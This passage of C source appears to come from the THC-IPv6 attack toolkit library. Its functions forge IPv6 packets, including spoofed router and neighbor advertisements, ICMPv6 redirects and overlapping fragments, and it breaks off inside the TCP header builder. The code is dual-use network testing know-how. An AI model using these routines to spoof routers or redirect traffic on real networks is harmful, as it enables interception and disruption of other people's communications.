// mtu 1280 } } else { adata[frag_len - 16] = NXT_TCP; adata[frag_len - 8] = 44; // scrport adata[frag_len - 7] = 44; adata[frag_len - 6] = overlap_spoof_type / 256; // dstport adata[frag_len - 5] = overlap_spoof_type % 256; adata[frag_len - 4] = 1; adata[frag_len - 3] = getpid() % 256; // fake seq num adata[frag_len - 2] = getpid() % 256; // fake seq num adata[frag_len - 1] = 2; } adata[frag_len] = type; count = data_len / frag_len; if (data_len % frag_len > 0) { count++; last_size = data_len % frag_len; } else last_size = frag_len; if (debug) printf("DEBUG: data to fragment has size of %d bytes (incl. spoof data), sending %d packets with size %d, last packet has %d bytes\n", data_len, count, frag_len, last_size); while (count) { if (run > 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, dptr / 8, count == 1 ? 0 : 1, id)) { free(srcmac); free(dstmac); return -1; } if (count > 1) memcpy(buf, adata + run * frag_len, frag_len); else memcpy(buf, adata + run * frag_len, last_size); if (thc_add_data6(pkt, &pkt_len, NXT_DST, buf, count == 1 ? 
last_size : frag_len)) { free(srcmac); free(dstmac); return -1; } thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); } dptr += frag_len; if (run == 0) dptr -= 16; run++; count--; } // now we send the first pkt if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) { free(srcmac); free(dstmac); return -1; } if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, id)) { free(srcmac); free(dstmac); return -1; } memcpy(buf, adata, frag_len); if (thc_add_data6(pkt, &pkt_len, NXT_DST, buf, frag_len)) { free(srcmac); free(dstmac); return -1; } thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); free(adata); free(srcmac); free(dstmac); return 0; } int thc_ping6(char *interface, unsigned char *src, unsigned char *dst, int size, int count) { //, char **packet, int *packet_len) { unsigned char *pkt = NULL; int pkt_len; unsigned char buf[size]; int ret, counter = count; memset(buf, 'A', size); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, size, 0) < 0) return -1; if (count < 0) counter = 1; else counter = count; while (counter > 0) { ret += thc_generate_and_send_pkt(interface, NULL, NULL, pkt, &pkt_len); counter--; } pkt = thc_destroy_packet(pkt); return ret; } int thc_ping26(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *src, unsigned char *dst, int size, int count) { //, char **packet, int *packet_len) { unsigned char *pkt = NULL; int pkt_len; unsigned char buf[size]; int ret, counter = count; memset(buf, 'A', size); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, size, 0) < 0) return -1; 
if (count < 0) counter = 1; else counter = count; while (counter > 0) { ret += thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); counter--; } pkt = thc_destroy_packet(pkt); return ret; } int thc_neighboradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac, unsigned int flags, unsigned char *target) { unsigned char *pkt = NULL, *mysrc, *mydst, *mysrcmac; int pkt_len; unsigned char buf[24]; int ret; if (src == NULL) mysrc = thc_get_own_ipv6(interface, dst, PREFER_LINK); else mysrc = src; if (target == NULL) target = mysrc; if (dst == NULL) mydst = thc_resolve6("ff02:0:0:0:0:0:0:1"); else mydst = dst; if (srcmac == NULL) mysrcmac = thc_get_own_mac(interface); else mysrcmac = srcmac; memcpy(buf, target, 16); if (mysrcmac != NULL) { buf[16] = 2; buf[17] = 1; memcpy(&buf[18], mysrcmac, 6); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, mysrc, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mysrcmac); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, (unsigned char *) &buf, sizeof(buf), 0) < 0) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mysrcmac); return -1; } ret = thc_generate_and_send_pkt(interface, mysrcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mysrcmac); return ret; } int thc_routersol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac) { unsigned char *pkt = NULL, *mydst; int pkt_len; int ret; // unsigned char buf[8]; if (dst == NULL) mydst = thc_resolve6("ff02:0:0:0:0:0:0:2"); else mydst = dst; // memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); return -1; } if 
(thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, NULL, 0 /*(unsigned char*)&buf, sizeof(buf) */ , 0) < 0) { if (dst == NULL) free(mydst); return -1; } ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); return ret; } int thc_neighborsol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *target, unsigned char *srcmac, unsigned char *dstmac) { unsigned char *pkt = NULL, *mysrc, *mymac = NULL, *mydst; int pkt_len; unsigned char buf[24]; int ret; if (target == NULL && dst == NULL) return -1; if (src == NULL) { if (dst != NULL) mysrc = thc_get_own_ipv6(interface, dst, PREFER_LINK); else if (target != NULL) mysrc = thc_get_own_ipv6(interface, target, PREFER_LINK); else mysrc = thc_get_own_ipv6(interface, NULL, PREFER_LINK); } else mysrc = src; if (srcmac == NULL) mymac = thc_get_own_mac(interface); else mymac = srcmac; if (dst == NULL) { //mydst = thc_resolve6("ff02::1"); // we could do a limited multicast here but we dont mydst = thc_resolve6("ff02::1:ff00:0"); memcpy(mydst + 13, target + 13, 3); } else mydst = dst; if (target == NULL) target = mydst; memcpy(buf, target, 16); if (mymac != NULL) { buf[16] = 1; buf[17] = 1; memcpy(&buf[18], mymac, 6); } // XXX TODO FIXME: check if dst ip6 in ip6 header is target ip or multicast if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, mysrc, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } ret = thc_generate_and_send_pkt(interface, mymac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return ret; } int 
thc_routeradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char default_ttl, int managed, unsigned char *prefix, int prefixlen, int mtu, unsigned int lifetime) { unsigned char *pkt = NULL, *mysrc, *mydst, *mymac; int pkt_len, ret = 0; unsigned char buf[56]; unsigned int flags; if (prefix == NULL) return -1; if (src == NULL) mysrc = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else mysrc = src; if (srcmac == NULL) mymac = thc_get_own_mac(interface); else mymac = srcmac; if (dst == NULL) mydst = thc_resolve6("ff02:0:0:0:0:0:0:1"); else mydst = dst; flags = default_ttl << 24; if (managed) flags += (128 + 64 + 32 + 8) << 16; flags += (lifetime > 65535 ? 65535 : lifetime); memset(buf, 0, sizeof(buf)); buf[1] = 250; // this defaults reachability checks to approx 1 minute buf[5] = 30; // this defaults neighbor solitication messages to aprox 15 seconds // options start at byte 12 // mtu buf[8] = 5; buf[9] = 1; if (mtu) { buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; } // prefix info buf[16] = 3; buf[17] = 4; buf[18] = prefixlen; if (managed) buf[19] = 128 + 64 + 32 + 16; if (lifetime) { buf[20] = lifetime / 16777216; buf[21] = (lifetime % 16777216) / 65536; buf[22] = (lifetime % 65536) / 256; buf[23] = lifetime % 256; memcpy(&buf[24], &buf[20], 4); } // 4 bytes reserved memcpy(&buf[32], prefix, 16); // source link buf[48] = 1; buf[49] = 1; if (mymac != NULL) memcpy(&buf[50], mymac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, mysrc, mydst, 0, 0, 0, 0, 0)) == NULL) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, flags, (unsigned char *) &buf, sizeof(buf), 0) < 0) { if (dst == NULL) free(mydst); if (src == NULL) free(mysrc); if (srcmac == NULL) free(mymac); return -1; } ret = thc_generate_and_send_pkt(interface, mymac, 
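NULL, pkt, &pkt_len);
  pkt = thc_destroy_packet(pkt);
  if (dst == NULL)
    free(mydst);
  if (src == NULL)
    free(mysrc);
  if (srcmac == NULL)
    free(mymac);

  return ret;
}

/*
 * Send an ICMPv6 "packet too big" message that quotes orig_pkt.
 *
 * interface     device name
 * src           IPv6 source, passed to thc_create_ipv6_extended()
 * srcmac/dstmac passed to thc_generate_and_send_pkt()
 * mtu           value placed in the ICMPv6 flags field
 * orig_pkt      the offending IPv6 packet; the destination of the reply is
 *               read from orig_pkt + 8, so the caller must supply at least a
 *               complete IPv6 header
 * orig_pkt_len  number of bytes of orig_pkt to quote
 *
 * Returns the result of thc_generate_and_send_pkt(), or -1 on bad input or
 * when the packet could not be built.
 */
int thc_toobig6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned int mtu, unsigned char *orig_pkt, int orig_pkt_len) {
  unsigned char *pkt = NULL, *dst;
  int pkt_len;
  unsigned char buf[1500];
  int buflen = orig_pkt_len, ret, if_mtu;

//  if (orig_pkt_len > 0)
//    buflen = orig_pkt_len > mtu - 48 ? mtu - 48 : orig_pkt_len;
  if (orig_pkt == NULL || buflen < 1)
    return -1;

  if_mtu = thc_get_mtu(interface);
  if (buflen > if_mtu - 48)
    buflen = if_mtu - 48 - do_hdr_size;
  // The interface MTU is not bounded by the size of buf: with an MTU above
  // 1548 the copy below would run past the 1500 byte stack buffer.
  if (buflen > (int) sizeof(buf))
    buflen = (int) sizeof(buf);
  // a failed MTU lookup or a large encapsulation header can push this to <= 0
  if (buflen < 1)
    return -1;

  memcpy(buf, orig_pkt, buflen);
  dst = orig_pkt + 8;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_TOOBIG, 0, mtu, buf, buflen, 0) < 0) {
    pkt = thc_destroy_packet(pkt);      // do not leak the half-built packet
    return -1;
  }

  ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len);
  pkt = thc_destroy_packet(pkt);

  return ret;
}

int thc_paramprob6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned int pointer, unsigned char *orig_pkt, int orig_pkt_len) {
  unsigned char *pkt = NULL, *dst;
  int pkt_len, ret;
  unsigned char buf[1022];

  if (orig_pkt_len > 0)
    memcpy(buf, orig_pkt, orig_pkt_len > 1022 ? 1022 : orig_pkt_len);
  dst = orig_pkt + 8;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PARAMPROB, code, pointer, (unsigned char *) &buf, orig_pkt_len > 1022 ? 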
1022 : orig_pkt_len, 0) < 0) return -1; ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); return ret; } int thc_unreach6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned char *orig_pkt, int orig_pkt_len) { unsigned char *pkt = NULL, *dst; int pkt_len, ret; unsigned char buf[1022]; if (orig_pkt_len > 0) memcpy(buf, orig_pkt, orig_pkt_len > 1022 ? 1022 : orig_pkt_len); dst = orig_pkt + 8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_UNREACH, code, 0, (unsigned char *) &buf, orig_pkt_len > 1022 ? 1022 : orig_pkt_len, 0) < 0) return -1; ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); return ret; } int thc_redir6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char *newrouter, unsigned char *newroutermac, unsigned char *orig_pkt, int orig_pkt_len) { unsigned char *pkt = NULL, dst[16], osrc[16]; int pkt_len, ret; unsigned char buf[1070]; memset(buf, 0, sizeof(buf)); memcpy(dst, orig_pkt + 8, 16); memcpy(osrc, orig_pkt + 24, 16); memcpy(buf, newrouter, 16); memcpy(&buf[16], osrc, 16); buf[32] = 2; buf[33] = 1; memcpy(&buf[34], newroutermac, 6); buf[40] = 4; buf[41] = orig_pkt_len > 1022 ? 128 : (orig_pkt_len + 8) / 8; if ((orig_pkt_len + 8) % 8 > 0) buf[41] += 1; if (orig_pkt_len > 0) memcpy(buf + 48, orig_pkt, orig_pkt_len > 1022 ? 1022 : orig_pkt_len); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_REDIR, 0, 0, (unsigned char *) &buf, orig_pkt_len > 1022 ? 
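1042 : orig_pkt_len + 48, 0) < 0)
    return -1;

  ret = thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len);
  pkt = thc_destroy_packet(pkt);

  return ret;
}

/*
 * Allocate a packet descriptor (thc_ipv6_hdr) and fill in the IPv6 header
 * fields. No wire bytes are produced here; hdr->pkt stays NULL.
 *
 * interface  device used to look up an own address when src is NULL
 * prefer     preference passed to thc_get_own_ipv6()
 * pkt_len    out: set to 40 before anything else is done
 * src        16 byte source address, NULL = look one up for dst
 * dst        16 byte destination address, must not be NULL
 * ttl        0 = 255, -1 = 0, anything else is used as given
 * length, class, label   -1 = 0, anything else is used as given
 * version    0 = 6, -1 = 0, anything else is used as given
 *
 * Returns the descriptor, or NULL if allocation fails, dst is NULL or no
 * source address is available. The caller owns the result and releases it
 * with thc_destroy_packet().
 */
unsigned char *thc_create_ipv6_extended(char *interface, int prefer, int *pkt_len, unsigned char *src, unsigned char *dst, int ttl, int length, int label, int class, int version) {
  thc_ipv6_hdr *hdr;
  unsigned char *my_src;

  *pkt_len = 40;
  if ((hdr = malloc(sizeof(thc_ipv6_hdr))) == NULL)
    return NULL;

  hdr->pkt = NULL;
  hdr->pkt_len = 0;

  if (src == NULL)
    my_src = thc_get_own_ipv6(interface, dst, prefer);
  else
    my_src = src;

  if (dst == NULL || my_src == NULL) {
    if (src == NULL)
      free(my_src);
    free(hdr);                  // the descriptor was leaked on this path before
    return NULL;
  }

  memcpy(hdr->src, my_src, 16);
  memcpy(hdr->dst, dst, 16);
  hdr->final_dst = hdr->dst;
  hdr->original_src = hdr->src;

  // 0 selects the usual default, -1 forces a literal zero into the field
  if (version == 0)
    hdr->version = 6;
  else if (version == -1)
    hdr->version = 0;
  else
    hdr->version = version;

  hdr->length = (length == -1) ? 0 : length;
  hdr->class = (class == -1) ? 0 : class;
  hdr->label = (label == -1) ? 0 : label;

  if (ttl == 0)
    hdr->ttl = 255;
  else if (ttl == -1)
    hdr->ttl = 0;
  else
    hdr->ttl = ttl;

  // empty header chain: nothing follows the IPv6 header yet
  hdr->next_segment = NULL;
  hdr->final = NULL;
  hdr->next = NXT_NONXT;
  hdr->final_type = NXT_NONXT;

  if (src == NULL)
    free(my_src);

  return (unsigned char *) hdr;
}

unsigned char *thc_create_ipv6(char *interface, int *pkt_len, unsigned char *src, unsigned char *dst) {
  return thc_create_ipv6_extended(interface, dst != NULL && *dst == 0xff ? 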
PREFER_LINK : PREFER_GLOBAL, pkt_len, src, dst, 255, 0, 0, 0, 0); } // XXX TODO FIXME int thc_add_ipv4_extended(unsigned char *pkt, int *pkt_len, int src, int dst, unsigned char tos, int id, unsigned char ttl) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf2 = malloc(20), type = NXT_IP4; if (nehdr == NULL || hdr == NULL || buf2 == NULL) { if (buf2 != NULL) free(buf2); if (nehdr != NULL) free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = type; hdr->next_segment = (char *) nehdr; } else { ehdr->next = type; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = type; memset(buf2, 0, 20); buf2[0] = 0x45; buf2[3] = 20; // needs to be updated at final! buf2[4] = getpid() % 256; buf2[5] = getpid() / 256; buf2[8] = 0xff; buf2[9] = NXT_NONXT; // needs to be updated at final! memcpy(buf2 + 12, (char*)&src + _TAKE4, 4); memcpy(buf2 + 16, (char*)&dst + _TAKE4, 4); /* // needs to be updated at final! 
checksum = checksum_pseudo_header(NULL, NULL, NXT_IP4, buf2, 20); buf2[10] = checksum / 256; buf2[11] = checksum % 256; */ nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf2; nehdr->data_len = 20; nehdr->length = 20; hdr->length += 20; *pkt_len += 20; return 0; } int thc_add_ipv4(unsigned char *pkt, int *pkt_len, int src, int dst) { return thc_add_ipv4_extended(pkt, pkt_len, src, dst, 0, 0, 64); } int thc_add_ipv4_rudimentary(unsigned char *pkt, int *pkt_len, int src4, int dst4, int port) { #define THC_IPv4_RUDIMENTARY_LEN (20 + 8) thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; char *ihdr = malloc(THC_IPv4_RUDIMENTARY_LEN); // ipv4 hdr + udp-emtpy thc_ipv6_ext_hdr *ehdr; int checksum; if (ihdr == NULL) return -1; memset(ihdr, 0, THC_IPv4_RUDIMENTARY_LEN); if (hdr->final != NULL) { ehdr = (thc_ipv6_ext_hdr *) hdr->final; ehdr->next_segment = (char *) ihdr; ehdr->next = NXT_IP4_RUDIMENTARY; } else { hdr->next_segment = (char *) ihdr; hdr->next = NXT_IP4_RUDIMENTARY; } hdr->final = (char *) ihdr; hdr->final_type = NXT_IP4_RUDIMENTARY; // set ihdr buffer ihdr[0] = 0x45; ihdr[3] = THC_IPv4_RUDIMENTARY_LEN; ihdr[4] = getpid() % 256; ihdr[5] = getpid() / 256; ihdr[8] = 0xff; if (port == -1) { ihdr[9] = NXT_ICMP4; ihdr[20] = 8; // ICMPv4 Echo Request ihdr[22] = 0xf7; ihdr[23] = 0xff; } else { ihdr[9] = NXT_UDP; ihdr[20] = 5; // srcport ihdr[21] = port % 256; // srcport ihdr[22] = (port / 256) % 256; ihdr[23] = port % 256; ihdr[25] = 8; // udp pkt length // no checksum } memcpy(ihdr + 12, (char*)&src4 + _TAKE4, 4); memcpy(ihdr + 16, (char*)&dst4 + _TAKE4, 4); checksum = checksum_pseudo_header(NULL, NULL, NXT_IP4, ihdr, 20); ihdr[10] = checksum / 256; ihdr[11] = checksum % 256; hdr->length += THC_IPv4_RUDIMENTARY_LEN; *pkt_len += THC_IPv4_RUDIMENTARY_LEN; return 0; } int thc_add_hdr_misc(unsigned char *pkt, int *pkt_len, unsigned char type, int len, unsigned char *buf, int buflen) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = 
(thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf2 = malloc((buflen % 8 == 6 ? buflen : (((buflen + 1) / 8) * 8) + 6)); if (nehdr == NULL || hdr == NULL || buf == NULL || buf2 == NULL) { if (buf2 != NULL) free(buf2); if (nehdr != NULL) free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = type; hdr->next_segment = (char *) nehdr; } else { ehdr->next = type; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = type; memset(buf2, 0, (buflen % 8 == 6 ? buflen : (((buflen + 1) / 8) * 8) + 6)); memcpy(buf2, buf, buflen); nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf2; nehdr->data_len = (buflen % 8 == 6 ? buflen : (((buflen + 1) / 8) * 8) + 6); if (len == -1) nehdr->length = (nehdr->data_len + 1) / 8; else nehdr->length = len % 256; hdr->length += (buflen % 8 == 6 ? buflen + 2 : (((buflen + 1) / 8) * 8) + 6 + 2); *pkt_len += (buflen % 8 == 6 ? buflen + 2 : (((buflen + 1) / 8) * 8) + 6 + 2); return 0; } int thc_add_hdr_route(unsigned char *pkt, int *pkt_len, unsigned char **routers, unsigned char routerptr) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); int i = 0, j; unsigned char *buf; if (nehdr == NULL || hdr == NULL) { free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = NXT_ROUTE; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_ROUTE; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_ROUTE; while (routers[i] != NULL) i++; if (i > 23) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: IPv6 Routing Header is adding more than 23 targets, packet might be dropped by destination\n"); if (i == 0) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: IPv6 Routing Header added without routing targets\n"); if ((buf = malloc(i * 16 + 2 + 4)) == NULL) { free(nehdr); return -1; } memset(buf, 0, i * 16 + 2 + 4); buf[1] = 
routerptr; // byte 0 = type; byte 2 reserved; bytes 3-5: loose source routing for (j = 0; j < i; j++) memcpy(buf + 6 + j * 16, routers[j], 16); nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf; nehdr->data_len = i * 16 + 2 + 4; nehdr->length = i * 2; hdr->length += nehdr->data_len + 2; *pkt_len += nehdr->data_len + 2; if (i > 0 && routerptr > 0) hdr->final_dst = nehdr->data + 6 + (i - 1) * 16; return 0; } int thc_add_hdr_mobileroute(unsigned char *pkt, int *pkt_len, unsigned char *dst) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf; if (nehdr == NULL || hdr == NULL) { free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = NXT_ROUTE; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_ROUTE; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_ROUTE; if ((buf = malloc(16 + 2 + 4)) == NULL) { free(nehdr); return -1; } memset(buf, 0, 16 + 2 + 4); // byte 0 = type; 1 = routers to do; byte 2 reserved; bytes 3-5: loose source routing buf[0] = 2; buf[1] = 1; memcpy(buf + 6, dst, 16); nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf; nehdr->data_len = 16 + 2 + 4; nehdr->length = 2; hdr->length += nehdr->data_len + 2; *pkt_len += nehdr->data_len + 2; hdr->final_dst = nehdr->data + 6; return 0; } int thc_add_hdr_oneshotfragment(unsigned char *pkt, int *pkt_len, unsigned int id) { unsigned char buf[6]; int pid; memset(buf, 0, sizeof(buf)); if (id == 0) { pid = getpid(); memcpy(buf + 2, (char *) &pid + _TAKE4, 4); buf[4] = 0xb0; buf[5] = 0x0b; } else memcpy(buf + 2, (char *) &id + _TAKE4, 4); return thc_add_hdr_misc(pkt, pkt_len, NXT_FRAG, -1, buf, sizeof(buf)); } int thc_add_hdr_fragment(unsigned char *pkt, int *pkt_len, int offset, char more_frags, unsigned int id) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, 
*nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf = malloc(6); int coffset = (offset > 8191 ? 8191 : offset) << 3; if (offset > 8191) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: fragment offset can not be larger than 8191 (2^13 - 1)\n"); free(nehdr); free(buf); return -1; } if (nehdr == NULL || hdr == NULL || buf == NULL) { free(nehdr); free(buf); return -1; } if (ehdr == NULL) { hdr->next = NXT_FRAG; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_FRAG; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_FRAG; if (more_frags) coffset++; memset(buf, 0, 6); buf[0] = coffset / 256; buf[1] = coffset % 256; buf[2] = id / 16777216; buf[3] = (id % 16777216) / 65536; buf[4] = (id % 65536) / 256; buf[5] = id % 256; nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf; nehdr->data_len = 6; nehdr->length = (nehdr->data_len + 1) / 8; hdr->length += nehdr->data_len + 2; *pkt_len += nehdr->data_len + 2; return 0; } int thc_add_hdr_dst(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen) { return thc_add_hdr_misc(pkt, pkt_len, NXT_OPTS, -1, buf, buflen); } int thc_add_hdr_hopbyhop(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen) { return thc_add_hdr_misc(pkt, pkt_len, NXT_HDR, -1, buf, buflen); } int thc_add_hdr_nonxt(unsigned char *pkt, int *pkt_len, int hdropt) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; if (hdr->final_type == NXT_NONXT) { // nothing to be done, its the default } else { switch (hdr->final_type) { case NXT_IP6: case NXT_HDR: case NXT_ROUTE: case NXT_FRAG: case NXT_OPTS: case NXT_ESP: case NXT_AH: // nothing to be done as its the default break; default: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: Not possible to attach a no-next-header attribute if the last header is a icmp/tcp/udp/data segment\n"); } } return 0; } int thc_add_icmp6(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int 
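data_len, int checksum) {
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_icmp6_hdr *ihdr = malloc(sizeof(thc_icmp6_hdr));
  thc_ipv6_ext_hdr *ehdr;

  if (ihdr == NULL)
    return -1;
  memset(ihdr, 0, sizeof(thc_icmp6_hdr));

  if (hdr->final != NULL) {
    ehdr = (thc_ipv6_ext_hdr *) hdr->final;
    ehdr->next_segment = (char *) ihdr;
    ehdr->next = NXT_ICMP6;
  } else {
    hdr->next_segment = (char *) ihdr;
    hdr->next = NXT_ICMP6;
  }
  hdr->final = (char *) ihdr;
  hdr->final_type = NXT_ICMP6;

  ihdr->type = type;
  ihdr->code = code;
  ihdr->flags = flags;

  if (checksum == 0) {
    ihdr->checksum = DO_CHECKSUM;
  } else
    ihdr->checksum = checksum;

  if (data_len > 0 && data != NULL) {
    if ((ihdr->data = malloc(data_len)) == NULL)
      return -1;
    ihdr->data_len = data_len;
    memcpy(ihdr->data, data, data_len);
  } else {
    ihdr->data = NULL;
    ihdr->data_len = 0;
  }

  hdr->length += data_len + 8;
  *pkt_len += data_len + 8;

  return 0;
}

/*
 * Append a TCP segment as the final header of the packet descriptor pkt.
 *
 * sport, dport, sequence, ack, flags, window, urgent are stored as given.
 * option/option_len  TCP options; the stored length is rounded up to a
 *                    multiple of four and the padding is zero filled
 * data/data_len      payload, copied
 *
 * The checksum is always set to DO_CHECKSUM. hdr->length and *pkt_len grow by
 * data_len + 20 + option_len. Returns 0, or -1 if memory could not be
 * allocated, in which case the header chain is left untouched.
 */
int thc_add_tcp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int sequence, unsigned int ack, unsigned char flags, unsigned short int window, unsigned short int urgent, char *option, int option_len, char *data, int data_len) {
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_tcp_hdr *ihdr = malloc(sizeof(thc_tcp_hdr));
  thc_ipv6_ext_hdr *ehdr;
  int i = option_len;

  if (ihdr == NULL)
    return -1;
  memset(ihdr, 0, sizeof(thc_tcp_hdr));
  ihdr->data = NULL;
  ihdr->data_len = 0;
  ihdr->option = NULL;
  ihdr->option_len = 0;

  // Copy payload and options before touching the chain, so that an
  // allocation failure neither dereferences NULL nor leaves a half-filled
  // header linked into the packet.
  if (data_len > 0 && data != NULL) {
    if ((ihdr->data = malloc(data_len)) == NULL) {
      free(ihdr);
      return -1;
    }
    ihdr->data_len = data_len;
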